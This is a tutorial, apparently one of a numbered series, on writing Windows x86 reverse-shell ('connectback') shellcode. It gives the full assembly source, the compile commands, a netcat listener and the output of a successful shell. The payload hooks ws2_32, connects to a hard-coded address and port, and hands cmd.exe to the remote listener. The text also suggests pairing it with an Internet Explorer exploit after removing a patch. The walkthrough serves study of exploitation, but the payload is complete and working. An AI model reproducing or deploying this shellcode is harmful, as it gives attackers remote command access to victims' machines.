Shellcode Tutorial 8: Introduction to Networking - Connectback Shellcode


Introduction

This tutorial takes shellcode to the next level where your shellcode will make a connection from the victim machine back to the attacker. This shellcode is very similar to the Port Bind shellcode in the previous tutorial, with a few relatively small changes to allow your shellcode to connect back to the attacker. The attackers machine this time will also use netcat to setup a listener for the shellcode to connect back to so that a remote command prompt can be accessed.

A lot of the code was pulled and learned from the following awesome paper with some slight modifications.

    - http://www.hick.org/code/skape/papers/win32-shellcode.pdf
    (Project Shellcode Download: http://projectshellcode.com/downloads/http___www.hick.org_code_skape_pap...)


Our Aim

The first stage of this shellcode will perform the same steps as the previous tutorial, where Kernel32.dll is located and functions located. The same Kernel32 functions will be required:

    - LoadLibraryA
    - CreateProcessA
    - ExitProcess

The main difference with this process is that we no longer call bind, socket or accept, but instead use the connect networking function, which is not located in Kernel32.dll. This means that we need to load "ws2_32.dll" using LoadLibraryA, which contains the following functions that we want to call:

    - WSASocketA
    - connect
    - WSAStartup

Function hashes need to be created for all of these functions, which has been shown in previous tutorials.

Each of these networking functions are then used to start up networking within the process, create a socket, and then use it to connect back to the attackers IP address on a pre-defined port (4444).

Prior to sending the exploit, the attacker should setup a netcat listener at 127.1.1.1 on port 4444/TCP to accept the reverse connection. Once the connection is made by the shellcode, their client socket is connected to a new command shell process allowing them to send remote commands to the system.


Do we need WSAStartup and ExitProcess? (for those of you who didnt do the previous tutorial)

The WSAStartup function is used to initialize the networking within a process. Since our "shellcodetest" programming won't have networking already enabled then we need to call this function from our shellcode.

If the shellcode was contained within an exploit that was exploiting a process that already had networking initialized (such as Internet Explorer, IIS or Apache) then this function could be left out to make the shellcode smaller.

Similarly if size was tight then ExitProcess could also be left out and the parent process would simply hang.

If either of these are taken out then you also need to update the "hash list length" within the shellcode for ws2_32 and Kernel32, respectively. This is noted in the shellcode below.


The Shellcode

+--------------- Start connectback.asm --------------+

;connectback.asm
[SECTION .text]

BITS 32

global _start

_start:

    jmp start_asm

;DEFINE FUNCTIONS

;FUNCTION: find_kernel32

find_kernel32:
    push esi
    xor eax, eax
    mov eax, [fs:eax+0x30]
    test eax, eax
    js find_kernel32_9x
find_kernel32_nt:
    mov eax, [eax + 0x0c]
    mov esi, [eax + 0x1c]
    lodsd
    mov eax, [eax + 0x8]
    jmp find_kernel32_finished
find_kernel32_9x:
    mov eax, [eax + 0x34]
    lea eax, [eax + 0x7c]
    mov eax, [eax + 0x3c]
find_kernel32_finished:
    pop esi
    ret

;END FUNCTION: find_kernel32

;FUNCTION: find_function

find_function:
    pushad
    mov ebp, [esp + 0x24]
    mov eax, [ebp + 0x3c]
    mov edx, [ebp + eax + 0x78]
    add edx, ebp
    mov ecx, [edx + 0x18]
    mov ebx, [edx + 0x20]
    add ebx, ebp
find_function_loop:
    jecxz find_function_finished
    dec ecx
    mov esi, [ebx + ecx * 4]
    add esi, ebp
    
compute_hash:
    xor edi, edi
    xor eax, eax
    cld
compute_hash_again:
    lodsb
    test al, al
    jz compute_hash_finished
    ror edi, 0xd
    add edi, eax
    jmp compute_hash_again
compute_hash_finished:
find_function_compare:
    cmp edi, [esp + 0x28]
    jnz find_function_loop
    mov ebx, [edx + 0x24]
    add ebx, ebp
    mov cx, [ebx + 2 * ecx]
    mov ebx, [edx + 0x1c]
    add ebx, ebp
    mov eax, [ebx + 4 * ecx]
    add eax, ebp
    mov [esp + 0x1c], eax
find_function_finished:
    popad
    ret
    
;END FUNCTION: find_function

;FUNCTION: resolve_symbols_for_dll

resolve_symbols_for_dll:
    lodsd
    push eax
    push edx
    call find_function
    mov [edi], eax
    add esp, 0x08
    add edi, 0x04
    cmp esi, ecx
    jne resolve_symbols_for_dll
resolve_symbols_for_dll_finished:
    ret

;END FUNCTION: resolve_symbols_for_dll

;DEFINE CONSTANTS
    
locate_kernel32_hashes:
    call locate_kernel32_hashes_return

    ;LoadLibraryA
    db 0x8e
    db 0x4e
    db 0x0e
    db 0xec

    ;CreateProcessA
    db 0x72
    db 0xfe
    db 0xb3
    db 0x16

    ;ExitProcess
    db 0x7e
    db 0xd8
    db 0xe2
    db 0x73

;locate_ws2_32_hashes:

    ;WSASocketA
    db 0xd9
    db 0x09
    db 0xf5
    db 0xad

    ;connect
    db 0xec
    db 0xf9
    db 0xaa
    db 0x60

    ;WSAStartup
    db 0xcb
    db 0xed
    db 0xfc
    db 0x3b

;END DEFINE CONSTANTS

start_asm: ; start our main program
    sub esp, 0x68 ; allocate space on stack for function addresses
    mov ebp, esp ; set ebp as frame ptr for relative offset on stack

    call find_kernel32 ;find address of Kernel32.dll
    mov edx, eax

    ;resolve kernel32 symbols
    jmp short locate_kernel32_hashes ;locate address of our hashes
locate_kernel32_hashes_return: ;define return label to return to this code
    pop esi ;get constants address from stack
    lea edi, [ebp + 0x04] ;this is where we store our function addresses
    mov ecx, esi
    add ecx, 0x0C ;length of kernel32 hash list
    call resolve_symbols_for_dll

    ;resolve ws2_32 symbols
add ecx, 0x0C ;length of ws2_32 hash list

    ;create the string ws2_32 on the stack
xor eax, eax
mov ax, 0x3233
push eax
push dword 0x5f327377
mov ebx, esp ;ebx now points to "ws2_32"

push ecx
push edx
push ebx
call [ebp + 0x04] ;call LoadLibraryA(ws2_32)

pop edx ;edx now holds location of ws2_32.dll
pop ecx
mov edx, eax
call resolve_symbols_for_dll

initialize_cmd: ;push the string "cmd" onto the stack
    mov eax, 0x646d6301
    sar eax, 0x08
    push eax
    mov [ebp + 0x30], esp

WSAStartup: ;initialise networking
    
    xor edx,edx ;make some stack space
    mov dh, 0x03 ;sizeof(WSADATA) is 0x190
    sub esp, edx

     ;initialize winsock
    push esp ;use stack for WSADATA
    push 0x02 ;wVersionRequested
    call [ebp + 18h] ;call WSAStartup

    add esp, 0x0300 ;move esp over WSAData

;SECTION: start custom shellcode

create_socket: ;same as portbind
    xor eax, eax ;zero eax
    push eax ;Push the dwFlags argument to WSASocket as 0.
    push eax ;Push the g argument to WSASocket as 0.
    push eax ;Push the lpProtocolInfo argument to WSASocket as NULL.
    push eax ;Push the protocol argument to WSASocket as 0.
    inc eax ;Increment eax to 1.
    push eax ;Push the type argument to WSASocket as SOCK STREAM.
    inc eax ;Increment eax to 2.
    push eax ;Push the af argument to WSASocket as AF INET.
    call [ebp + 0x10] ;Call WSASocket to allocate a socket for later use.
    mov esi, eax ;Save the socket file descriptor in esi.

do_connect:
    push 0x0101017f ;Push the address of the remote machine to connect to in network-byte order. In this case 127.1.1.1 has been used.
    mov eax, 0x5c110102 ;Set the high order bytes of eax to the port to connect to in networkbyte order (4444). The low order bytes should be set to the family, in this case AF INET3.
    dec ah ;Decrement the second byte of eax to get it to zero and have the family be correctly set to AF INET.
    push eax ;Push the sin port and sin family attributes.
    mov ebx, esp ;Set ebx to the pointer to the struct sockaddr in that has been initialized on the stack.
    xor eax, eax ;Zero eax.
    mov al, 0x10 ;Set the low order byte of eax to 16 to represent the size of the struct sockaddr in.
    push eax ;Push the namelen argument which has been set to 16.
    push ebx ;Push the name argument which has been set to the initialized struct sockaddr in on the stack.
    push esi ;Push the s argument as the file descriptor that was previously returned from WSASocket.
    call [ebp + 0x14] ;Call connect to establish a TCP connection to the remote machine on the specified port.

initialize_process:
    xor ecx, ecx ;Zero ecx.
    mov cl, 0x54 ;Set the low order byte of ecx to 0x54 which will be used to represent the size of the STARTUPINFO and PROCESS INFORMATION structures on the stack.
    sub esp, ecx ;Allocate stack space for the two structures.
    mov edi, esp ;Set edi to point to the STARTUPINFO structure.
    push edi ;Preserve edi on the stack as it will be modified by the following instructions.
zero_structs:
    xor eax, eax ;Zero eax to for use with stosb to zero out the two structures.
    rep stosb ;Repeat storing zero at the buffer starting at edi until ecx is zero.
    pop edi ;Restore edi to its original value.
initialize_structs:
    mov byte[edi], 0x44 ;Set the cb attribute of STARTUPINFO to 0x44 (the size of the structure).
    inc byte[edi + 0x2d] ;Set the STARTF USESTDHANDLES flag to indicate that the hStdInput, hStdOutput, and hStdError attributes should be used.
    push edi ;Preserve edi again as it will be modified by the stosd.
    mov eax, esi ;Set eax to the client file descriptor that was returned by accept
    lea edi, [edi + 0x38] ;Load the effective address of the hStdInput attribute in the STARTUPINFO structure.
    stosd ;Set the hStdInput attribute to the file descriptor returned from accept.
    stosd ;Set the hStdOutput attribute to the file descriptor returned from accept.
    stosd ;Set the hStdError attribute to the file descriptor returned from accept.
    pop edi ;Restore edi to its original value.
execute_process:
    xor eax, eax ;Zero eax for use with passing zerod arguments.
    lea esi, [edi + 0x44] ;Load the effective address of the PROCESS INFORMATION structure into esi.
    push esi ;Push the pointer to the lpProcessInformation structure.
    push edi ;Push the pointer to the lpStartupInfo structure.
    push eax ;Push the lpStartupDirectory argument as NULL.
    push eax ;Push the lpEnvironment argument as NULL
    push eax ;Push the dwCreationFlags argument as 0.
    inc eax ;Increment eax to 1.
    push eax ;Push the bInheritHandles argument as TRUE due to the fact that the client needs to inherit the socket file descriptor.
    dec eax ;Decrement eax back to zero.
    push eax ;Push the lpThreadAttributes argument as NULL.
    push eax ;Push the lpProcessAttributes argument as NULL.
    push dword [ebp + 0x30] ;Push the lpCommandLine argument as the pointer to cmd. Only change in this section to portbind.
    push eax ;Push the lpApplicationName argument as NULL.
    call [ebp + 0x08] ;Call CreateProcessA to created the child process that has its input and output redirected from and to the remote machine via the TCP connection.

exit_process:
    call [ebp + 0x0c] ;Call ExitProcess as the parent no longer needs to execute

+--------------- End connectback.asm --------------+


Compiling the Assembly Code

You can now use the following "shellcode-compiler.sh" command to compile this shellcode and automatically create a test executable. You should have downloaded this script and any other required scripts and programs in Tutorial 1. You should get something similar to the following output (depending on the version of the shellcode-compiler.sh script that you have).

    $ ./shellcode-compiler.sh connectback.asm
    
    Compiling connectback.asm to connectback.bin
    [nasm -f bin -o connectback.bin connectback.asm]
    
    Converting connectback.bin to connectback.shellcode
    [./xxd-shellcode.sh connectback.asm]
    \xXX\xXX\xXX\xXX\xXX...[snip]...\xXX\xXX\xXX\xXX\xXX
    
    Creating connectback.shellcodetest.c
    
    Compiling connectback.shellcodetest.c to connectback.shellcodetest[.exe]
    [gcc -o connectback.shellcodetest connectback.shellcodetest.c]
    
    Complete. You can now execute ./connectback.shellcodetest[.exe]
    
    Enjoy,
    Ty Miller
    www.projectshellcode.com

You should now be ready to test the shellcode.


Testing the shellcode

Before we run this program, we want to setup a netcat listener on IP address 127.1.1.1 on port 4444/TCP. In a new cygwin bash shell run the following command on your local system:

    # nc -l -s 127.1.1.1 -p 4444 -n -v
     listening on [127.1.1.1] 4444 ...

In your original cygwin bash window, you should now be able to execute your shellcode via the test program "./connectback.shellcodetest". The shellcode is designed to connect to our listener on 127.1.1.1 on port 4444/TCP, and then redirects that connection to "cmd.exe", and then the parent process should exit cleanly.

    # ./connectback.shellcodetest
    (it should simply exit cleanly)

In your second cygwin window you should have now received the connection and be redirected to a Windows command prompt, which may take a minute.

    # nc -l -s 127.1.1.1 -p 4444 -n -v
     listening on [127.1.1.1] 4444 ...
     connect to [127.1.1.1] from (UNKNOWN) [127.1.1.1] 1758
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\Administrator>

If you see a Windows command prompt then you have succeeded.

If you havent then I have found that cygwin doesnt always seem to play happily with the shellcode test program with shellcode containing network connections. The latest version of the shellcode-compiler.sh script automatically generates a template exploit for the Internet Explorer vulnerability ms07-004 containing your shellcode encoded with Unicode encoding. You can try this exploit on your own system by uninstalling the Windows XP Internet Explorer patch marked KB929969, then load up the template exploit in Internet Explorer.


Clean Up

You should make sure that you kill any netcat listeners that you have setup on your machine.by either using the kill program in cygwin, or by using the Windows Task Manager.


Congratulations!

You have just created shellcode that loads ws2_32.dll, initializes networking, and then connects back to a backdoor listener, which is then redirected to a command prompt on the compromised box.